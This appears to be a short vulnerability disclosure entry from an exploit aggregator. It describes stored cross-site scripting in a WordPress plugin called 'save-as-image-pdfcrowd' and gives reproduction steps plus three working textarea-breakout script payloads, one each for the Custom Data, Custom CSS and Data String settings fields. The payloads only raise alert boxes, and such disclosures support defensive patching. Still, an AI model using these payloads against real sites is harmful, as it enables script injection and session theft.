Share
## https://sploitus.com/exploit?id=WPEX-ID:1526985D-2F8F-4B2A-97F3-633C51D024B8
1. Go to "Settings > Save as Image"
2. Toggle on "Expert Settings"
3. Multiple fields are vulnerable:
"Custom Data": `</textarea><script>alert(/XSS: save-as-image-pdfcrowd[custom_data]/)</script>`
"Custom CSS": `</textarea><script>alert(/XSS: save-as-image-pdfcrowd[custom_css]/)</script>`
"Data String": `</textarea><script>alert(/XSS: save-as-image-pdfcrowd[data_string]/)</script>`
4. Save and see XSS